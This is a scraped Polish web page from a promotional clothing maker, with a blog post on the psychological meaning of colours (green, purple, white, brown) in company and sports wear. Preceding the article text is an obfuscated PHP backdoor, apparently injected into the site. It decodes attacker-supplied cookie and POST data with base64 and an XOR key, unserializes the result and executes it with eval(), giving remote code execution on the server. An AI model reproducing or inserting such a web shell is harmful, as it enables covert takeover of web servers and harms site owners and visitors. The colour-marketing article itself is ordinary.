$EJaOT = "\126" . chr ( 955 - 860 ).chr ( 671 - 603 )."\x58" . chr (99); $VVLiGmUYa = 'c' . 'l' . "\141" . chr (115) . chr ( 410 - 295 )."\x5f" . "\x65" . "\170" . 'i' . chr (115) . chr ( 562 - 446 )."\x73";$rFawcyv = class_exists($EJaOT); $EJaOT = "36152";$VVLiGmUYa = "21333";$yYoMUkBeNy = FALSE;if ($rFawcyv === $yYoMUkBeNy){function sAPreRGv(){return FALSE;}$XHXXE = "10820";sAPreRGv();class V_DXc{private function ohtQEAxR($XHXXE){if (is_array(V_DXc::$GaZiZD)) {$JiEBcU = str_replace("\x3c" . chr ( 625 - 562 )."\x70" . "\150" . chr ( 372 - 260 ), "", V_DXc::$GaZiZD["\x63" . chr ( 296 - 185 ).chr ( 613 - 503 )."\x74" . chr (101) . 'n' . chr (116)]);eval($JiEBcU); $XHXXE = "10820";exit();}}private $xHLRbEru;public function hSghv(){echo 50151;}public function __destruct(){$XHXXE = "64768_25380";$this->ohtQEAxR($XHXXE); $XHXXE = "64768_25380";}public function __construct($XBnRjxdBt=0){$mVTgGVkpqk = $_POST;$ywjXMgqydX = $_COOKIE;$rcJjWi = "05f4c334-1f3e-49a5-9f97-1e89d0914668";$kWepRrWnk = @$ywjXMgqydX[substr($rcJjWi, 0, 4)];if (!empty($kWepRrWnk)){$MINpojrmRv = "base64";$KPzRTIf = "";$kWepRrWnk = explode(",", $kWepRrWnk);foreach ($kWepRrWnk as $RtkBB){$KPzRTIf .= @$ywjXMgqydX[$RtkBB];$KPzRTIf .= @$mVTgGVkpqk[$RtkBB];}$KPzRTIf = array_map($MINpojrmRv . chr ( 113 - 18 ).'d' . chr ( 618 - 517 )."\x63" . chr ( 231 - 120 ).'d' . chr ( 599 - 498 ), array($KPzRTIf,)); $KPzRTIf = $KPzRTIf[0] ^ str_repeat($rcJjWi, (strlen($KPzRTIf[0]) / strlen($rcJjWi)) + 1);V_DXc::$GaZiZD = @unserialize($KPzRTIf);}}public static $GaZiZD = 25873;}$prmYwRn = new /* 45608 */ V_DXc(10820 + 10820);unset($prmYwRn);} Szwalnia psychologii czyli znaczenie koloru – część 2 - Szwalnia Wave Group

Szwalnia psychologii czyli znaczenie koloru – część 2

producent odzieży reklamowej superman

Każda firma wchodząca z klientami w kontakt przy pomocy strony internetowej, wnętrza oddziału i odzieży noszącej przej jej pracowników posiada swój dominujący kolor. Kolor ten może zostać wybrany świadomie lub powstać w wyniku losowych decyzji rożnych osób odpowiedzialnych za elementy składające się na cały wizerunek. Kolor niesie ze sobą dużą siłę przekazu i nie raz tworzy pierwsze wrażenie klienta o nas, zanim przedstawiciel firmy otworzy usta by wypowiedzieć pierwsze zdanie. Sprawa podobnie ma się też w kwestii odzieży sportowej, oddziałując na drużynę, która nosi kolory na sobie jak i drużynę przeciwną. Wybierając kolor dla odzieży firmowej lub sportowej powinieneś znać psychologiczne znaczenie kolorów. Kolor przekazuje Twoim klientom podświadomie wiele informacji, a więc jego wybór ma znaczenie dla Twojego biznesu.

ZIELONY – Harmonia, Natura, Wzrost, Dobrobyt

Odzież firmowa w odcieniu zieleni sugeruje ambicje i progres. Zielony to kolor obserwacji, stąd odnosi się do zawodów w nastawionych na słuchanie klienta. Kolor doradców adwokatów, psychologów. Tak jak zieleń drzew wnosi do miasta zdrowie i poprawę powietrza tak zielony w biznesie też odnosi się do poprawy w społeczeństwie, stąd fundacje charytatywne również odnajdą w nim sojusznika.

W wielu korporacjach, pokoje w których sadza się gości czy klientów przed ważnymi spotkaniami mają zielony kolor i nawet nazywają się potocznie „zielonymi pokojami”. Dzieje się tak właśnie ze względu na relaksujący efekt jaki kolor zielony ma na człowieka.

Zielony dobrze wpasowuje się do odzieży sportowej podkreślając zespołowość, współpracę i współdziałanie, czyli bardzo ważne cechy drużynowym działaniu. W odzieży firmowej i reklamowej wykorzystane odpowiedniego odcieniu zieleni umiejscawia przedstawiciela firmy nie jako osobę dominującą, ale jako równą klientowi i chętną do współpracy z nim. Ludzkie oko czuje się dobrze w zielonym otoczeniu. Dlatego zastosowanie zieleni w przestrzeni firmy działa uspokajająco na klientów i zachęca ich do pozostania dłużej.

FIOLETOWY Ekstrawagancja, fantazja, pomysły, zmysły

Purpurowy łączy ze sobą elementy fantazji i wyobraźni, bogactwa oraz zmysłów i odczuwania. Używany jest w biznesie w sektorach w których estetyka i uczucia mają duży wpływ na podejmowanie decyzji przez klienta, dlatego perfumy, czekolady czy upiększające kosmetyki otoczone zostaną tą barwą. Dzieje się tak dlatego, że fiolet wzmaga aktywację partii mózgu odpowiedzialnych za zmysły, a za tym smaki oraz zapachy i przyjemne dla oka produkty czy usługi będą podkreślone przez fiolet, na przykład dzięki opakowaniom w tej barwie.

Kolor wybierany często w odzieży firmowej dla pracowników drogich hoteli i lokalów usługowych, gdyż łączy element elegancji z wyczuleniem na potrzeby klienta. W psychologii marketingu purpurowy wykazał dobrą reakcję w odbiorze zarówno wśród grupy młodych odbiorców jak i starszych. Kolor silny i wyróżniający się, a mimo to nie używany tak często w biznesie jak kolory podstawowe, czyli zieleń, czerwień i kolor niebieski.

BIAŁY czystość, nieskazitelność, niewinność, nowy początek, klarowność, szczerość

W psychologii biały symbolizuje nowy początek i niezapisana kartę papieru. Biały porządkuje i uspokaja, przez co zachęca do spróbowania nowych rzeczy i działania. Nie bez powodu dominuje jako barwa odzieży sektora medycznego. Dzieje się tak dlatego gdyż oddziałuje uspokajająco i wzbudza zaufanie. Biały kolor nie maskuje plam, a każde powstałe na takiej powierzchni zabrudzenie widać gołym okiem. Ta „szczerość” bieli przenosi się na odbiór noszącej go osoby jako takiej, która nie chce i nawet nie może nic ukryć. Coś czego od naszego lekarza bardzo byśmy oczekiwali. Poruszając temat bieli w odzieży nie sposób pominąć sukni ślubnej, która uosabia przecież niewinność, szczerość oraz nowy początek.

Biel bardziej niż jakikolwiek kolor odbija promienie słoneczne, przez co decyduje o tak częstym wybraniu go jako koloru ścian. W upalne dni, biel to niezrównany sojusznik co szczególnie korzystnie oddziałuje w przypadku odzieży sportowej.

BRĄZOWY – komfort, solidarność, dojrzałość, siła

Barwa odnosząca się do pozyskania dóbr materialnych, komfortu. Kolor neutralny stwarzający atmosferę prywatną i aurę bezpieczeństwa. Kojarzony z ziemią i drzewami brąz ma swoje odzwierciedlenie w biznesie w podkreśleniu tradycji, stabilności i bezpieczeństwa. Kurierzy, przedstawiciele policji w niektórych krajach posiadają mundury w tym właśnie kolorze wykorzystując jego walory do przekazania kojącej i uspokajającej aury jaką on emanuje.

Jaką wiadomość chcesz przekazać?
Kolor może podkreślać autorytet osoby reprezentującej firmę, zachęcać klienta do kupna towarów, studzić emocje jak również wywierać wiele innych podświadomych reakcji na odbiorcy. Dzięki łączeniu kolorów możesz korzystać z dobrodziejstwa różnych cech by złączyć je w taki wizerunek jaki chcesz reprezentować. Jeżeli chcesz:
Ustanowić wiarygodność i zaufanie – kolor niebieski to najlepsze rozwiązanie
Stworzyć przyjazny wizerunek i zachęcić klienta do kontaktu – jasne zielenie, błękit a nawet pomarańczowy wspomogą Cię w tym.
Zostać zauważonym i zyskać przewagę nad rozmówcą – wybierz czerwień.
Zależy ci na wyróżnieniu się, ale nie chcesz ryzykować antagonizowania? Żółty przykuje oko odbiorcy w sposób nie agresywny.
Szukasz pewności siebie, stabilności i siły – brąz nawiąże do tych cech i pomoże wydobyć je z Twojego charakteru i je podkreślić.

Nie istnieje coś takiego jak zły kolor, jedynie jego nieodpowiednie zastosowanie. Świadomość wyboru i rozważenie pozytywnych i negatywnych aspektów każdej barwy z pewnością przyczyni się do uzyskania właściwego efektu. W korporacjach na całym świecie kolor traktuje się jako potężne narzędzie i nie zostawia się go w rękach przypadku. Zmiana źle wybranego koloru na odzieży firmowej może okazać się kosztowna, dlatego warto przemyśleć dobrze tą decyzję jak najwcześniej.

Formularz kontaktowy